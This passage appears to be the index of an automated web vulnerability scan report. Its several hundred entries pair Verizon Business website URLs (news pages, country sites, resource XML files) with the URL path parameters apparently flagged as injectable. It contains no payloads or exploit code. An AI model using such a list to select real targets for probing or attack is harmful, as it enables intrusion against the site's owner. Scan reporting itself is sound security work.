1.356. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 3]

1.357. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 1]

1.358. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 1]

1.359. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 2]

1.360. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 2]

1.361. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 3]

1.362. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 3]

1.363. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 1]

1.364. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 1]

1.365. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 2]

1.366. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 2]

1.367. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 3]

1.368. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 3]

1.369. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 1]

1.370. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 1]

1.371. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 2]

1.372. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 2]

1.373. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 3]

1.374. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 3]

1.375. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 1]

1.376. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 1]

1.377. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 2]

1.378. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 2]

1.379. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 3]

1.380. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 3]

1.381. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 1]

1.382. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 1]

1.383. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 2]

1.384. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 2]

1.385. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 3]

1.386. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 3]

1.387. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 1]

1.388. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 1]

1.389. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 2]

1.390. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 2]

1.391. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 3]

1.392. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 3]

1.393. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 1]

1.394. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 1]

1.395. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 2]

1.396. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 2]

1.397. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 3]

1.398. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 3]

1.399. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 1]

1.400. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 1]

1.401. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 2]

1.402. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 2]

1.403. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 3]

1.404. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 3]

1.405. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 1]

1.406. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 1]

1.407. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 2]

1.408. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 2]

1.409. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 3]

1.410. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 3]

1.411. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 1]

1.412. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 1]

1.413. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 2]

1.414. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 2]

1.415. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 3]

1.416. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 3]

1.417. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 1]

1.418. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 1]

1.419. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 2]

1.420. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 2]

1.421. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 3]

1.422. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 3]

1.423. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 1]

1.424. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 1]

1.425. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 2]

1.426. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 2]

1.427. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 3]

1.428. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 3]

1.429. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 1]

1.430. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 1]

1.431. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 2]

1.432. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 2]

1.433. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 3]

1.434. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 3]

1.435. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 1]

1.436. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 1]

1.437. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 2]

1.438. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 2]

1.439. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 3]

1.440. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 3]

1.441. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 1]

1.442. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 1]

1.443. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 2]

1.444. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 2]

1.445. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 3]

1.446. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 3]

1.447. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 1]

1.448. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 1]

1.449. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 2]

1.450. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 2]

1.451. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 3]

1.452. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 3]

1.453. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 1]

1.454. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 1]

1.455. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 2]

1.456. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 2]

1.457. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 3]

1.458. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 3]

1.459. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 1]

1.460. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 1]

1.461. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 2]

1.462. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 2]

1.463. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 3]

1.464. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 3]

1.465. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 1]

1.466. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 1]

1.467. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 2]

1.468. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 2]

1.469. http://www.verizonbusiness.com/ar/ [REST URL parameter 1]

1.470. http://www.verizonbusiness.com/ar/ [REST URL parameter 1]

1.471. http://www.verizonbusiness.com/at/ [REST URL parameter 1]

1.472. http://www.verizonbusiness.com/at/ [REST URL parameter 1]

1.473. http://www.verizonbusiness.com/au/ [REST URL parameter 1]

1.474. http://www.verizonbusiness.com/au/ [REST URL parameter 1]

1.475. http://www.verizonbusiness.com/be/ [REST URL parameter 1]

1.476. http://www.verizonbusiness.com/be/ [REST URL parameter 1]

1.477. http://www.verizonbusiness.com/br/ [REST URL parameter 1]

1.478. http://www.verizonbusiness.com/br/ [REST URL parameter 1]

1.479. http://www.verizonbusiness.com/ca/ [REST URL parameter 1]

1.480. http://www.verizonbusiness.com/ca/ [REST URL parameter 1]

1.481. http://www.verizonbusiness.com/ch/ [REST URL parameter 1]

1.482. http://www.verizonbusiness.com/ch/ [REST URL parameter 1]

1.483. http://www.verizonbusiness.com/cl/ [REST URL parameter 1]

1.484. http://www.verizonbusiness.com/cl/ [REST URL parameter 1]

1.485. http://www.verizonbusiness.com/cn/ [REST URL parameter 1]

1.486. http://www.verizonbusiness.com/cn/ [REST URL parameter 1]

1.487. http://www.verizonbusiness.com/co/ [REST URL parameter 1]

1.488. http://www.verizonbusiness.com/co/ [REST URL parameter 1]

1.489. http://www.verizonbusiness.com/countries/ [REST URL parameter 1]

1.490. http://www.verizonbusiness.com/countries/ [REST URL parameter 1]

1.491. http://www.verizonbusiness.com/de/ [REST URL parameter 1]

1.492. http://www.verizonbusiness.com/de/ [REST URL parameter 1]

1.493. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 1]

1.494. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 1]

1.495. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 2]

1.496. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 2]

1.497. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 3]

1.498. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 3]

1.499. http://www.verizonbusiness.com/dk/ [REST URL parameter 1]

1.500. http://www.verizonbusiness.com/dk/ [REST URL parameter 1]

1.501. http://www.verizonbusiness.com/es/ [REST URL parameter 1]

1.502. http://www.verizonbusiness.com/es/ [REST URL parameter 1]

1.503. http://www.verizonbusiness.com/fi/ [REST URL parameter 1]

1.504. http://www.verizonbusiness.com/fi/ [REST URL parameter 1]

1.505. http://www.verizonbusiness.com/fr/ [REST URL parameter 1]

1.506. http://www.verizonbusiness.com/fr/ [REST URL parameter 1]

1.507. http://www.verizonbusiness.com/hk/ [REST URL parameter 1]

1.508. http://www.verizonbusiness.com/hk/ [REST URL parameter 1]

1.509. http://www.verizonbusiness.com/ie/ [REST URL parameter 1]

1.510. http://www.verizonbusiness.com/ie/ [REST URL parameter 1]

1.511. http://www.verizonbusiness.com/in/ [REST URL parameter 1]

1.512. http://www.verizonbusiness.com/in/ [REST URL parameter 1]

1.513. http://www.verizonbusiness.com/it/ [REST URL parameter 1]

1.514. http://www.verizonbusiness.com/it/ [REST URL parameter 1]

1.515. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 1]

1.516. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 1]

1.517. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 2]

1.518. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 2]

1.519. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 3]

1.520. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 3]

1.521. http://www.verizonbusiness.com/jp/ [REST URL parameter 1]

1.522. http://www.verizonbusiness.com/jp/ [REST URL parameter 1]

1.523. http://www.verizonbusiness.com/kr/ [REST URL parameter 1]

1.524. http://www.verizonbusiness.com/kr/ [REST URL parameter 1]

1.525. http://www.verizonbusiness.com/mx/ [REST URL parameter 1]

1.526. http://www.verizonbusiness.com/mx/ [REST URL parameter 1]

1.527. http://www.verizonbusiness.com/nl/ [REST URL parameter 1]

1.528. http://www.verizonbusiness.com/nl/ [REST URL parameter 1]

1.529. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 1]

1.530. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 1]

1.531. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 2]

1.532. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 2]

1.533. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 3]

1.534. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 3]

1.535. http://www.verizonbusiness.com/no/ [REST URL parameter 1]

1.536. http://www.verizonbusiness.com/no/ [REST URL parameter 1]

1.537. http://www.verizonbusiness.com/nz/ [REST URL parameter 1]

1.538. http://www.verizonbusiness.com/nz/ [REST URL parameter 1]

1.539. http://www.verizonbusiness.com/pa/ [REST URL parameter 1]

1.540. http://www.verizonbusiness.com/pa/ [REST URL parameter 1]

1.541. http://www.verizonbusiness.com/privacy/ [REST URL parameter 1]

1.542. http://www.verizonbusiness.com/privacy/ [REST URL parameter 1]

1.543. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 1]

1.544. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 1]

1.545. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 2]

1.546. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 2]

1.547. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 3]

1.548. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 3]

1.549. http://www.verizonbusiness.com/pt/ [REST URL parameter 1]

1.550. http://www.verizonbusiness.com/pt/ [REST URL parameter 1]

1.551. http://www.verizonbusiness.com/resources/ [REST URL parameter 1]

1.552. http://www.verizonbusiness.com/resources/ [REST URL parameter 1]

1.553. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 1]

1.554. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 1]

1.555. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 2]

1.556. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 2]

1.557. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 1]

1.558. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 1]

1.559. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 2]

1.560. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 2]

1.561. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 1]

1.562. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 1]

1.563. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 2]

1.564. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 2]

1.565. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 1]

1.566. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 1]

1.567. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 2]

1.568. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 2]

1.569. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 1]

1.570. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 1]

1.571. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 2]

1.572. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 2]

1.573. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 1]

1.574. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 1]

1.575. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 2]

1.576. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 2]

1.577. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 1]

1.578. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 1]

1.579. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 2]

1.580. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 2]

1.581. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 1]

1.582. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 1]

1.583. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 2]

1.584. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 2]

1.585. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 1]

1.586. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 1]

1.587. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 2]

1.588. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 2]

1.589. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 1]

1.590. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 1]

1.591. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 2]

1.592. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 2]

1.593. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 1]

1.594. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 1]

1.595. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 2]

1.596. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 2]

1.597. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 1]

1.598. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 1]

1.599. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 2]

1.600. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 2]

1.601. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 1]

1.602. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 1]

1.603. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 2]

1.604. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 2]

1.605. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 1]

1.606. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 1]

1.607. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 2]

1.608. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 2]

1.609. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 1]

1.610. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 1]

1.611. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 2]

1.612. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 2]

1.613. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 1]

1.614. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 1]

1.615. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 2]

1.616. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 2]

1.617. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 1]

1.618. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 1]

1.619. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 2]

1.620. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 2]

1.621. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 1]

1.622. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 1]

1.623. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 2]

1.624. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 2]

1.625. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 1]

